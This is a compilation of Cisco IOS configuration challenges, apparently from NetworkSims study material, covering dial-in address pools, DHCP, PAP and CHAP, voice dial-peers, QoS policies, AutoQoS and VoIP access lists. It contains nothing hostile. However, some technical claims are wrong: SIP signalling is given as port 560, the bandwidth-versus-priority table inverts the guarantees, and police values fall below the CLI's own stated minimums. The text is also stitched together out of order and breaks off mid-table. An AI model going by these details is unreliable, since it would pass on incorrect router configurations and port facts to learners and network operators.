Cisco Router Challenge 121


Outline
This challenge involves the configuration of the allocation of the address for the dial-in host
using a local pool.


Objectives
The objectives of this challenge are to:

Define async parameters.
Define a local pool of addresses for the remote host.

Example
> enable
# config t
(config)# int async 6
(config-if)# peer default ip address pool testing
(config-if)# exit
(config)# ip local pool testing 10.0.0.1 10.0.0.10

Explanation
In this example the access-server uses the Async 6 port for an asynchronous connection.
Once it has connected it assigns the connected host with an IP address from the pool of
addresses from 10.0.0.1 to 10.0.0.10 (see Figure 1).

Figure 1: Host assigned an address from the local pool. The access server's Async 6 port connects to the host over the PSTN; with the commands above (peer default ip address pool testing, ip local pool testing 10.0.0.1 10.0.0.10) the host is assigned an address from the pool 10.0.0.1 to 10.0.0.10.

Cisco Router Challenge 122


Outline
This challenge involves the configuration of DHCP allocation address for the dial-in host
using a DHCP pool.
Objectives


The objectives of this challenge are to:

Define async parameters.
Define the peer address.
Define a DHCP pool.

Example
> enable
# config t
(config)# int async 6
(config-if)# peer default ip address dhcp-pool wyoming
(config-if)# exit
(config)# ip dhcp pool wyoming
(config-dhcp)# network 249.189.108.0 255.255.255.0
(config-dhcp)# dns-server 249.189.108.58
(config-dhcp)# netbios-name-server 249.189.108.61
(config-dhcp)# lease 3
(config-dhcp)# default-router 249.189.108.87
(config-dhcp)# exit
(config)# ip dhcp ?
  conflict                   DHCP address conflict parameters
  database                   Configure DHCP database agents
  excluded-address           Prevent DHCP from assigning certain addresses
  limited-broadcast-address  Use all 1's broadcast address
  ping                       Specify ping parameters used by DHCP
  pool                       Configure DHCP address pools
  relay                      DHCP relay agent parameters
  smart-relay                Enable Smart Relay feature
(config)# ip dhcp excluded-address 249.189.108.26
(config)# ip dhcp ping ?
  packets  Specify number of ping packets
  timeout  Specify ping timeout
(config)# ip dhcp ping timeout 350

Explanation
In this example the access server uses the Async 6 port for an asynchronous connection. Once the call is up, it assigns the connected host an IP address taken from the DHCP pool wyoming (Figure 1). The excluded-address keeps 249.189.108.26 out of the pool, lease 3 sets a three-day lease, and the ping timeout (in milliseconds) bounds how long the server waits when probing an address for conflicts before offering it.


Figure 1: Host assigned an address from the DHCP server pool. The access server's Async 6 port connects to the host over the PSTN; with the commands above (peer default ip address dhcp-pool wyoming, ip dhcp pool wyoming with network 249.189.108.0 255.255.255.0, and the excluded address 249.189.108.26) the host is assigned an address from the DHCP pool.

Cisco Router Challenge 123


Outline
This challenge involves the configuration for PAP.
Objectives
The objectives of this challenge are to:

Define async parameters.
Define local address.
Define PAP details.

Example
> enable
# config t
(config)# hostname edinburgh
(config)# username newyork password test
(config)# int async 6
(config-if)# encapsulation ppp
(config-if)# ppp authentication pap
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# dialer map ip 192.168.1.2 name newyork
(config-if)# ppp pap sent-username edinburgh password ttt

Explanation
In this example the username is set as the hostname of the remote device: edinburgh sends the username edinburgh with password ttt, so newyork must hold username edinburgh password ttt to accept it, and the reverse applies for newyork's username and password test. Figure 1 shows an example configuration for two devices, on which either can connect to the other. Note that PAP sends the username and password across the link in clear text, so anyone able to tap the line reads them; CHAP (used in Challenges 115 to 117) should be preferred wherever both ends support it.
Figure 1: PAP configuration for two routers, edinburgh and newyork, connected over the PSTN via Async 6, each of which can authenticate the other. The edinburgh side is the example above; the newyork side is:

> enable
# config t
(config)# hostname newyork
(config)# username edinburgh password ttt
(config)# int async 6
(config-if)# encapsulation ppp
(config-if)# ppp authentication pap
(config-if)# ip address 192.168.1.2 255.255.255.0
(config-if)# dialer map ip 192.168.1.1 name edinburgh
(config-if)# ppp pap sent-username newyork password test
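The following is an added example, not from the original page: the same two-router setup rebuilt with CHAP, so that the password itself never crosses the link. Hostnames, addresses and Async 6 are the page's values; the shared secret chap-shared-secret is an assumption. CHAP sends an MD5 hash of the identifier, the secret and a random challenge, which is why it needs the secret in recoverable form on both routers: the peer's entry must use password, not secret (which stores a hash), and service password-encryption only hides it from casual viewing.

```cisco
! Added example, not from the original page. The shared secret is an assumption.
!
! --- edinburgh ---
hostname edinburgh
service password-encryption
username newyork password chap-shared-secret
interface Async6
 ip address 192.168.1.1 255.255.255.0
 encapsulation ppp
 ppp authentication chap
 dialer map ip 192.168.1.2 name newyork
!
! --- newyork ---
hostname newyork
service password-encryption
username edinburgh password chap-shared-secret
interface Async6
 ip address 192.168.1.2 255.255.255.0
 encapsulation ppp
 ppp authentication chap
 dialer map ip 192.168.1.1 name edinburgh
!
! Each router identifies itself with its own hostname and looks the peer's
! hostname up in its local username table to find the secret, so both
! entries must carry the same string. If the local hostname has to differ
! from the CHAP name (Challenges 115 to 117 use "ppp chap hostname newyork"
! for an ISP login), set it on the interface rather than renaming the router.
!
! Check with "debug ppp authentication": a good exchange shows
! "CHAP: O CHALLENGE", "CHAP: I RESPONSE" and "CHAP: O SUCCESS"; a wrong
! secret ends in "CHAP: O FAILURE" and no password ever appears on screen.
```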


17 CCNP ONT
Cisco Router Challenge 130
Outline
This challenge involves the configuration of a dial-peer.
Objectives
The objectives of this challenge are to:

Setup a dial-peer.

Example
> enable
# config t
Router(config)# dial-peer ?
  cor         Class of Restriction
  hunt        Define the dial peer hunting choice
  outbound    Define the outbound options
  terminator  Define the address terminate character
  voice       Voice type
Router(config)# dial-p v ?
  <1-2147483647>  Voice dial-peer tag
Router(config)# dial-p voice 1 ?
  mmoip  Multi Media Over IP
  pots   Telephony
  voatm  Voice over ATM
  vofr   Voice over Frame Relay
  voip   Voice over IP
Router(config)# dial-p voice 1 pots
Router(config-dial-peer)# ?
DIALPEER configuration commands:
answer-address
The Call Destination Number
application
The selected application
call-block
Incoming Call Blocking
capacity
capacity update timer config
carrier-id
Configure Carrier ID
clid
Caller ID option
corlist
set the Class of Restriction lists
default
Set a command to its defaults
description
Dialpeer specific description
destination-pattern
A full E.164 telephone number prefix
digit-strip
Use digit strip option for the POTS digits replacement
direct-inward-dial
Use Called Number as final call destination

NetworkSims.com

795

dnis-map
exit
fax
forward-digits

The name of a configured dnis-map


Exit from dial-peer configuration mode
Configure fax
Configure the destination digits forward of this
dialpeer
huntstop
Stop hunting on Dial-Peers
incoming
Incoming called number
information-type
Information type for dialpeer
max-conn
Sets the maximum connections per peer, negation sets
to unlimited
no
Negate a command or set its defaults
numbering-type
The calling/called party numbering type
permission
set the call orig/term permission of this dialpeer
preference
Configure the preference order of this dialpeer
prefix
The pattern to be dialed before the dialed num
register
Register the E.164 number of this dial peer with
gatekeeper
resource
Resource allocation policy
session
The session [ target | protocol | transport ] for this
peer
shutdown
Change the Admin State of this peer to down (no->up)
supplementary-service Config supplementary service features
supported-language
Language(s) supported by the peer
tgrep
TGREP config
tone
Generate tones
translate-outgoing
Translation rule
translation-profile
Translation profile
trunk-group-label
Configure Trunk Group Label
trunkgroup
trunk groups associated with this peer
voice
Configure GATEWAY dial-peer for voice services
voice-class
Set Dial-peer voice class control parameters
Router(config-dial-peer)# destination-pattern ?
WORD A sequence of digits - representing the prefix or full telephone number
Router(config-dial-peer)# destination-pattern 11
Router(config-dial-peer)# port 1/1/1
Router(config-dial-peer)# exit
Router(config)# dial-p voice 2 voip
Router(config-dial-peer)# ?
DIALPEER configuration commands:
  acc-qos                The Minimally Acceptable Quality of Service to be used in getting to this peer
  answer-address         The Call Destination Number
  application            The selected application
  call                   Per Voip dial-peer Call configuration
  call-block             Incoming Call Blocking
  carrier-id             Configure Carrier ID
  clid                   Caller ID option
  codec                  The codec rate to be attempted in getting to this peer
  corlist                set the Class of Restriction lists
  default                Set a command to its defaults
  description            Dialpeer specific description
  destination-pattern    A full E.164 telephone number prefix
  dnis-map               The name of a configured dnis-map
  dtmf-relay             Transport DTMF digits across IP link
  exit                   Exit from dial-peer configuration mode
  expect-factor          Expectation Factor of voice quality
  fax                    Configure fax
  fax-relay              fax-relay options
  huntstop               Stop hunting on Dial-Peers
  icpif                  Calculated Planning Impairment Factor
  incoming               Incoming called number
  ip                     Set ip packet options
  max-conn               Sets the maximum connections per peer, negation sets to unlimited
  max-redirects          Configure the max number of redirects for this dialpeer
  modem                  Modem commands through this peer
  no                     Negate a command or set its defaults
  numbering-type         The calling/called party numbering type
  permission             set the call orig/term permission of this dialpeer
  playout-delay          Configure voice playout delay buffer
  preference             Configure the preference order of this dialpeer
  req-qos                The desired Quality of Service to be used in getting to this peer
  roaming                Use roaming server
  rtp                    RTP config
  session                The session [ target | protocol | transport ] for this peer
  settle-call            Use settlement server
  shutdown               Change the Admin State of this peer to down (no->up)
  signal-type            The signaling type to be used when getting to this peer
  signaling              Signaling payload handling
  snmp                   Modify SNMP voice peer parameters
  supplementary-service  Config supplementary service features
  tech-prefix            The H.323 gateway technology prefix
  tone                   Generate tones
  translate-outgoing     Translation rule
  translation-profile    Translation profile
  trunk-group-label      Configure Trunk Group Label
  trunkgroup             trunk groups associated with this peer
  vad                    Use VoiceActivityDetection as necessary option
  voice                  Configure GATEWAY dial-peer for voice services
  voice-class            Set Dial-peer voice class control parameters
Router(config-dial-peer)# destination-pattern 22
Router(config-dial-peer)# session ?
  protocol   The session protocol to be used in getting to this peer
  target     The session target for this peer
  transport  The transport layer protocol used for this peer
Router(config-dial-peer)# sess target ?
  WORD  A string specifying the session target
Router(config-dial-peer)# session target ipv4:1.2.3.4

Cisco Router Challenge 131


Outline
This challenge involves the configuration of QoS (bandwidth and queue-limit).
Objectives
The objectives of this challenge are to:

Define QoS.
Limit the bandwidth.
Define a queue-limit.

Example
> en
# config t
(config)# class-map ?
  WORD       class-map name
  match-all  Logical-AND all matching statements under this classmap
  match-any  Logical-OR all matching statements under this classmap
(config)# class-map tayside
(config-cmap)# ?
QoS class-map configuration commands:
  description  Class-Map description
  exit         Exit from QoS class-map configuration mode
  match        classification criteria
  no           Negate or set default values of a command
  rename       Rename this class-map
(config-cmap)# exit
(config)# policy-map ankle
(config-pmap)# ?
QoS policy-map configuration commands:
  class        policy criteria
  description  Policy-Map description
  exit         Exit from QoS policy-map configuration mode
  no           Negate or set default values of a command
  rename       Rename this policy-map
  <cr>
(config-pmap)# class tayside
(config-pmap-c)# ?
QoS policy-map class configuration commands:
  bandwidth       Bandwidth
  exit            Exit from QoS class action configuration mode
  fair-queue      Enable Flow-based Fair Queuing in this Class
  no              Negate or set default values of a command
  police          Police
  priority        Strict Scheduling Priority for this Class
  queue-limit     Queue Max Threshold for Tail Drop
  random-detect   Enable Random Early Detection as drop policy
  service-policy  Configure QoS Service Policy
  set             Set QoS values
  shape           Traffic Shaping
  <cr>
(config-pmap-c)# bandwidth ?
  <8-2000000>  Kilo Bits per second
  percent      % of Available Bandwidth
(config-pmap-c)# bandwidth 128
(config-pmap-c)# queue-limit ?
  <1-512>  Packets
(config-pmap-c)# queue-limit 21
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int s0
(config-if)# service-policy output ankle

The class map defines the traffic.

Cisco Router Challenge 132


Outline
This challenge involves the configuration of QoS (default-class).
Objectives
The objectives of this challenge are to:

Define QoS.
Define a default class.

Example
> en
# config t
(config)# class-map ?
  WORD       class-map name
  match-all  Logical-AND all matching statements under this classmap
  match-any  Logical-OR all matching statements under this classmap
(config)# class-map tayside
(config-cmap)# ?
QoS class-map configuration commands:
  description  Class-Map description
  exit         Exit from QoS class-map configuration mode
  match        classification criteria
  no           Negate or set default values of a command
  rename       Rename this class-map
(config-cmap)# exit
(config)# policy-map ankle
(config-pmap)# ?
QoS policy-map configuration commands:
  class        policy criteria
  description  Policy-Map description
  exit         Exit from QoS policy-map configuration mode
  no           Negate or set default values of a command
  rename       Rename this policy-map
  <cr>
(config-pmap)# class tayside
(config-pmap-c)# ?
QoS policy-map class configuration commands:
  bandwidth       Bandwidth
  exit            Exit from QoS class action configuration mode
  fair-queue      Enable Flow-based Fair Queuing in this Class
  no              Negate or set default values of a command
  police          Police
  priority        Strict Scheduling Priority for this Class
  queue-limit     Queue Max Threshold for Tail Drop
  random-detect   Enable Random Early Detection as drop policy
  service-policy  Configure QoS Service Policy
  set             Set QoS values
  shape           Traffic Shaping
  <cr>
(config-pmap-c)# bandwidth ?
  <8-2000000>  Kilo Bits per second
  percent      % of Available Bandwidth
(config-pmap-c)# bandwidth 128
(config-pmap-c)# queue-limit ?
  <1-512>  Packets
(config-pmap-c)# queue-limit 21
(config-pmap-c)# exit
(config-pmap)# class ?
  WORD           class-map name
  class-default  System default class matching otherwise unclassified packets
(config-pmap)# class class-default
(config-pmap-c)# fair-queue
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int s0
(config-if)# service-policy output ankle

The class-default class does not have to be created before it is used in the policy-map. It
carries any other traffic which does not match the class-maps.

Cisco Router Challenge 133


Outline
This challenge allows the maximum bandwidth to be defined.
Objectives
The objectives of this challenge are to:

Define QoS.
Define interesting traffic types with a class-map.

Example
# config t
(config)# access-list 100 permit tcp host 165.246.68.4 host 200.194.252.5 eq echo
(config)# class-map Delaware
(config-cmap)# ?
QoS class-map configuration commands:
  description  Class-Map description
  exit         Exit from QoS class-map configuration mode
  match        classification criteria
  no           Negate or set default values of a command
  rename       Rename this class-map
(config-cmap)# description testing
(config-cmap)# match ?
  access-group         Access group
  any                  Any packets
  class-map            Class map
  cos                  IEEE 802.1Q/ISL class of service/user priority values
  destination-address  Destination address
  discard-class        Discard behavior identifier
  dscp                 Match DSCP in IP(v4) and IPv6 packets
  fr-de                Match on Frame-relay DE bit
  fr-dlci              Match on fr-dlci
  input-interface      Select an input interface to match
  ip                   IP specific values
  mpls                 Multi Protocol Label Switching specific values
  not                  Negate this match result
  packet               Layer 3 Packet length
  precedence           Match Precedence in IP(v4) and IPv6 packets
  protocol             Protocol
  qos-group            Qos-group
  source-address       Source address
(config-cmap)# match protocol ?
  arp            IP ARP
  bgp            Border Gateway Protocol
  bridge         Bridging
  bstun          Block Serial Tunnel
  cdp            Cisco Discovery Protocol
  citrix         Citrix Traffic
  compressedtcp  Compressed TCP
  cuseeme        CU-SeeMe desktop video conference
  custom-01      Custom protocol custom-01
  custom-02      Custom protocol custom-02
  custom-03      Custom protocol custom-03
  custom-04      Custom protocol custom-04
  custom-05      Custom protocol custom-05
  custom-06      Custom protocol custom-06
  custom-07      Custom protocol custom-07
  custom-08      Custom protocol custom-08
  custom-09      Custom protocol custom-09
  custom-10      Custom protocol custom-10
  dhcp           Dynamic Host Configuration
  dlsw           Data Link Switching (Direct encapsulation only)
  dns            Domain Name Server lookup
  egp            Exterior Gateway Protocol
  eigrp          Enhanced Interior Gateway Routing Protocol
  exchange       MS-RPC for Exchange
  fasttrack      FastTrack Traffic - KaZaA, Morpheus, Grokster...
  finger         Finger
  ftp            File Transfer Protocol
  gnutella       Gnutella Traffic - BearShare,LimeWire,Gnotella...
  gopher         Gopher
  gre            Generic Routing Encapsulation
  http           World Wide Web traffic
  icmp           Internet Control Message
  imap           Internet Message Access Protocol
  ip             IP
  ipinip         IP in IP (encapsulation)
  ipsec          IP Security Protocol (ESP/AH)
  ipv6           IPV6
  irc            Internet Relay Chat
  kazaa2         Kazaa Version 2
  kerberos       Kerberos
  l2tp           L2F/L2TP tunnel
  ldap           Lightweight Directory Access Protocol
  llc2           llc2
  napster        Napster Traffic
  netbios        NetBIOS
  netshow        Microsoft Netshow
  nfs            Network File System
  nntp           Network News Transfer Protocol
  notes          Lotus Notes(R)
  novadigm       Novadigm EDM
  ntp            Network Time Protocol
  pad            PAD links
  pcanywhere     Symantec pcANYWHERE
  pop3           Post Office Protocol
  pppoe          PPP over Ethernet
  pptp           Point-to-Point Tunneling Protocol
  printer        print spooler/lpd
  qllc           qllc protocol
  rcmd           BSD r-commands (rsh, rlogin, rexec)
  rip            Routing Information Protocol
  rsrb           Remote Source-Route Bridging
  rsvp           Resource Reservation Protocol
  rtp            Real Time Protocol
  rtspplayer     RTSP players streaming protocol
  secure-ftp     FTP over TLS/SSL
  secure-http    Secured HTTP
  secure-imap    Internet Message Access Protocol over TLS/SSL
  secure-irc     Internet Relay Chat over TLS/SSL
  secure-ldap    Lightweight Directory Access Protocol over TLS/SSL
  secure-nntp    Network News Transfer Protocol over TLS/SSL
  secure-pop3    Post Office Protocol over TLS/SSL
  secure-telnet  Telnet over TLS/SSL
  smtp           Simple Mail Transfer Protocol
  snapshot       Snapshot routing support
  snmp           Simple Network Management Protocol
  socks          SOCKS
  sqlnet         SQL*NET for Oracle
  sqlserver      MS SQL Server
  ssh            Secured Shell
  streamwork     Xing Technology StreamWorks player
  stun           Serial Tunnel
  sunrpc         Sun RPC
  syslog         System Logging Utility
  telnet         Telnet
  tftp           Trivial File Transfer Protocol
  vdolive        VDOLive streaming video
  vofr           voice over Frame Relay packets
  xwindows       X-Windows remote access
(config-cmap)# match protocol http
(config-cmap)# match protocol ftp
(config-cmap)# match protocol telnet
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# class-map VOICE
(config-cmap)# exit
(config)# class-map EXECTEST
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# ?
QoS policy-map configuration commands:
  class        policy criteria
  description  Policy-Map description
  exit         Exit from QoS policy-map configuration mode
  no           Negate or set default values of a command
  rename       Rename this policy-map
  <cr>
(config-pmap)# description test
(config-pmap)# class Delaware
(config-pmap-c)# ?
QoS policy-map class configuration commands:
  bandwidth       Bandwidth
  exit            Exit from QoS class action configuration mode
  fair-queue      Enable Flow-based Fair Queuing in this Class
  no              Negate or set default values of a command
  police          Police
  priority        Strict Scheduling Priority for this Class
  queue-limit     Queue Max Threshold for Tail Drop
  random-detect   Enable Random Early Detection as drop policy
  service-policy  Configure QoS Service Policy
  set             Set QoS values
  shape           Traffic Shaping
  <cr>
(config-pmap-c)# police ?
  <8000-2000000000>  Bits per second
  cir                Committed information rate
(config-pmap-c)# police 1000 ?
  <1000-512000000>  Burst bytes
  bc                Conform burst
  conform-action    action when rate is less than conform burst
  pir               Peak Information Rate
  <cr>
(config-pmap-c)# police 1000 500
(config-pmap-c-police)# ?
QoS Class Police configuration commands:
  conform-action  action when rate is less than conform burst
  exceed-action   action when rate is within conform and conform + exceed burst
  exit            Exit from Police configuration mode
  no              Negate or set default values of a command
  violate-action  action when rate is greater than conform + exceed burst
(config-pmap-c-police)# exit
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

Cisco Router Challenge 69


Outline
This challenge involves the configuration of CBWFQ.
Objectives
The objectives of this challenge are to:

Define CBWFQ.

Example
> en
# config t
(config)# access-list 108 permit ip 162.78.102.0 0.0.255.255 247.226.90.0 0.0.255.255
(config)# class-map tayside
(config-cmap)# match access-group 108
(config-cmap)# exit
(config)# policy-map ankle
(config-pmap)# class tayside
(config-pmap-c)# bandwidth 128
(config-pmap-c)# queue-limit 21
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int s0
(config-if)# service-policy output ankle

Explanation
The following shows an example of limiting all the traffic which fits access-list 111 to
2Mbps. The three steps are:

Class map: identify the traffic characteristic.
Policy map: define the policy for the traffic.
Service policy: apply the policy to an interface.

(config)# class-map cmap
(config-cmap)# match access-group 111
(config)# policy-map pmap
(config-pmap)# class cmap
(config-pmap-c)# bandwidth 2000
(config)# int s0
(config-if)# service-policy output pmap

Limit traffic which fits access-list 111 to 2Mbps

Ref:
http://www.netcraftsmen.net/welcher/papers/newqos121.html

Cisco Router Challenge 134


Outline
This challenge involves the configuration of auto QoS on an interface.
Objectives
The objectives of this challenge are to:

Define CEF (Cisco Express Forwarding), as this is required for Auto QoS.
Enable NBAR (Network Based Application Recognition), as this is required for Auto QoS.
Define the bandwidth on an interface.
Enable Auto QoS.

Example
> en
# config t
(config)# ip cef
(config)# int s0
(config-if)# bandwidth ?
  <1-10000000>  Bandwidth in kilobits
  inherit       Specify how bandwidth is inherited
(config-if)# bandwidth 256
(config-if)# ip nbar ?
  protocol-discovery  Enable NBAR protocol discovery
(config-if)# ip nbar protocol ?
  <cr>
(config-if)# ip nbar protocol
(config-if)# auto ?
  qos  Configure AutoQoS
(config-if)# auto qos ?
  voip  Configure AutoQoS for VoIP
(config-if)# auto qos voip ?
  trust  Trust the DSCP marking
  <cr>
(config-if)# auto qos voip
(config-if)# exit
(config)# exit
# sh ip nbar pr

 Serial0/0

                            Input                    Output
   Protocol                 Packet Count             Packet Count
                            Byte Count               Byte Count
                            5 minute bit rate (bps)  5 minute bit rate (bps)
   ------------------------ ------------------------ ------------------------
   [one row per NBAR protocol: bgp, citrix, cuseeme, custom-01 to custom-10, dhcp, dns, egp, eigrp, exchange, fasttrack, finger, ftp, gnutella, gopher, gre, http, icmp, imap, ipinip, ipsec, irc, kazaa2, kerberos, l2tp, ldap, napster, netbios, netshow, nfs, nntp, notes, novadigm, ntp, pcanywhere, pop3, pptp, printer, rcmd, rip, rsvp, rtp, rtspplayer, secure-ftp, secure-http, secure-imap, secure-irc, secure-ldap, secure-nntp, secure-pop3, secure-telnet, smtp, snmp, socks, sqlnet, sqlserver, ssh, streamwork, sunrpc, syslog, telnet, tftp, vdolive, xwindows and unknown, followed by Total; every input and output packet count, byte count and 5 minute bit rate is 0]

Explanation
Key facts:
CCNP Objective: QoS Implementation Methods.
AutoQoS for the Enterprise is the next generation of AutoQoS, and uses NBAR for traffic
discovery and classification. The basic form of Auto QoS is Auto QoS VoIP.
For Auto QoS to work, CEF and NBAR must be enabled. The bandwidth must also be
correctly defined on the interface.
AutoQoS automatically generates the QoS commands.
AutoQoS analyzes network traffic and tries to optimize the QoS through traffic classes,
which the AutoQoS Discovery method uses to create the policies that are applied to the
interface(s).
AutoQoS simplifies the configuration.
AutoQoS involves Classification (AutoQoS Discovery with NBAR discovers the
requirements); Policy generation (access-lists, class-maps and policy-maps are generated to
optimize the setup); Configuration (the required interfaces are configured); Monitoring
and reporting (the operation is continually updated and reported on); and Consistency
(a consistent setup across a range of devices).

Cisco Router Challenge 135


Outline
This challenge involves the configuration of QoS on VoIP traffic (H.323).
Objectives
The objectives of this challenge are to:

Define an ACL for VoIP (H.323).
Define QoS on VoIP traffic.
Define bit rate and a burst rate for the VoIP traffic.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# police ?
  <8000-2000000000>  Bits per second
  cir                Committed information rate
(config-pmap-c)# police 100 ?
  <1000-512000000>  Burst bytes
  bc                Conform burst
  conform-action    action when rate is less than conform burst
  pir               Peak Information Rate
  <cr>
(config-pmap-c)# police 100 500
(config-pmap-c-police)# exit
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

In this case VoIP is detected on TCP port 1720 and on UDP ports from 16384 to 32767:
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720

The main classifications for VoIP are:

H.323. TCP port 1720 is used for H.323 Host Call, and UDP ports from 16384 to 32767 for
RTP (Realtime Transport Protocol). This is used in MS Messenger, and so on.
H.323 (Callserve). UDP port 1719 and TCP port 1720 are used for call signalling, and
UDP ports from 5000 to 65535 for RTP (Realtime Transport Protocol). This is used in
Callserve, and so on.
SIP. TCP/UDP port 560 is used for signalling, and UDP ports from 16384 to 32767 for
RTP (Realtime Transport Protocol). This is used in SIP, and so on.
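As an added example (not NetworkSims code), the following evaluates the two access-list 100 entries above against constructed flows, using first-match semantics and the implicit deny at the end of the list, to show which packets land in class VOIP and which fall through to class-default.

```python
"""Evaluate the VoIP access-list from this challenge against sample flows to
see which packets class-map VOIP (and so the policer) would catch.  Added
example, not NetworkSims code: only the 'permit PROTO any any [eq N | range
A B]' form the challenge uses is parsed, and the flows are constructed."""
import re

# Challenge 135's ACL in full IOS form (the permit keyword is mandatory).
ACL_100 = [
    "access-list 100 permit udp any any range 16384 32767",
    "access-list 100 permit tcp any any eq 1720",
]

_ACE = re.compile(
    r"access-list (?P<acl>\d+) (?P<action>permit|deny) (?P<proto>tcp|udp|ip) "
    r"any any(?: (?P<op>eq|range) (?P<p1>\d+)(?: (?P<p2>\d+))?)?$"
)


def parse_acl(lines):
    """Turn ACL lines into (action, proto, low_port, high_port) tuples, in order."""
    entries = []
    for line in lines:
        m = _ACE.match(line.strip())
        if not m:
            raise ValueError(f"unsupported ACE: {line!r}")
        if m["op"] == "eq":
            lo = hi = int(m["p1"])
        elif m["op"] == "range":
            lo, hi = int(m["p1"]), int(m["p2"])
        else:
            lo, hi = 0, 65535        # no port qualifier: any destination port
        entries.append((m["action"], m["proto"], lo, hi))
    return entries


def acl_action(entries, proto, dst_port):
    """First-match evaluation, with the implicit deny that ends every IOS ACL."""
    for action, aproto, lo, hi in entries:
        if aproto in (proto, "ip") and lo <= dst_port <= hi:
            return action
    return "deny"


def classify_flow(entries, proto, dst_port):
    """'VOIP' when 'match access-group 100' permits the flow, else 'class-default'."""
    return "VOIP" if acl_action(entries, proto, dst_port) == "permit" else "class-default"
```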

Cisco Router Challenge 136


Outline
This challenge involves the configuration of QoS on VoIP traffic (SIP).
Objectives
The objectives of this challenge are to:

Define an ACL for VoIP (SIP).
Define QoS on VoIP traffic.
Define bit rate and a burst rate for the VoIP traffic.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 560
(config)# access-list 100 permit udp any any eq 560
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# police ?
  <8000-2000000000>  Bits per second
  cir                Committed information rate
(config-pmap-c)# police 100 ?
  <1000-512000000>  Burst bytes
  bc                Conform burst
  conform-action    action when rate is less than conform burst
  pir               Peak Information Rate
  <cr>
(config-pmap-c)# police 100 500
(config-pmap-c-police)# exit
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

In this case VoIP is detected on TCP/UDP port 560 for the call setup and on UDP ports from
16384 to 32767 for the actual call traffic:
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 560
(config)# access-list 100 permit udp any any eq 560

The main classifications for VoIP are:

H.323. TCP port 1720 is used for H.323 Host Call, and UDP ports from 16384 to 32767 for
RTP (Realtime Transport Protocol). This is used in MS Messenger, and so on.
H.323 (Callserve). UDP port 1719 and TCP port 1720 are used for call signalling, and
UDP ports from 5000 to 65535 for RTP (Realtime Transport Protocol). This is used in
Callserve, and so on.
SIP. TCP/UDP port 560 is used for signalling, and UDP ports from 16384 to 32767 for
RTP (Realtime Transport Protocol). This is used in SIP, and so on.

Cisco Router Challenge 137


Outline
This challenge involves the configuration of QoS on VoIP traffic (H.323).
Objectives
The objectives of this challenge are to:

Define an ACL for VoIP (H.323).
Define QoS on VoIP traffic.
Define bit rate and a burst rate for the VoIP traffic.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# bandwidth ?
  <8-2000000>  Kilo Bits per second
  percent      % of total Bandwidth
  remaining    % of the remaining bandwidth
(config-pmap-c)# bandwidth 50
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

Cisco Router Challenge 138


Outline
This challenge involves the configuration of QoS on VoIP traffic (H.323).
Objectives
The objectives of this challenge are to:

Define an ACL for VoIP (H.323).
Define QoS on VoIP traffic.
Define bit rate and a burst rate for the VoIP traffic.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# bandwidth ?
  <8-2000000>  Kilo Bits per second
  percent      % of total Bandwidth
  remaining    % of the remaining bandwidth
(config-pmap-c)# bandwidth percent ?
  <1-100>  Percentage
  <cr>
(config-pmap-c)# bandwidth percent 50
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

Cisco Router Challenge 139


Outline
This challenge involves the configuration of QoS on VoIP traffic (H.323).
Objectives
The objectives of this challenge are to:

Define an ACL for VoIP (H.323).
Define QoS on VoIP traffic.
Define bit rate and a burst rate for the VoIP traffic.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# priority ?
  <8-2000000>  Kilo Bits per second
  percent      % of total bandwidth
(config-pmap-c)# priority 100
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

The main differences between the bandwidth and priority commands are:

                               bandwidth Command   priority Command
Maximum bandwidth guarantee    Yes                 Yes
Minimum bandwidth guarantee    No                  Yes
Built-in policer               No                  Yes
Provides low latency           No                  Yes

Cisco Router Challenge 140


Outline
This challenge involves the configuration of QoS on VoIP traffic (H.323).
Objectives
The objectives of this challenge are to:

Define an ACL for VoIP (H.323).
Define QoS on VoIP traffic.
Define bit rate and a burst rate for the VoIP traffic.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# priority ?
  <8-2000000>  Kilo Bits per second
  percent      % of total bandwidth
(config-pmap-c)# priority percent 50
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

The main differences between the bandwidth and priority commands are:

                               bandwidth Command   priority Command
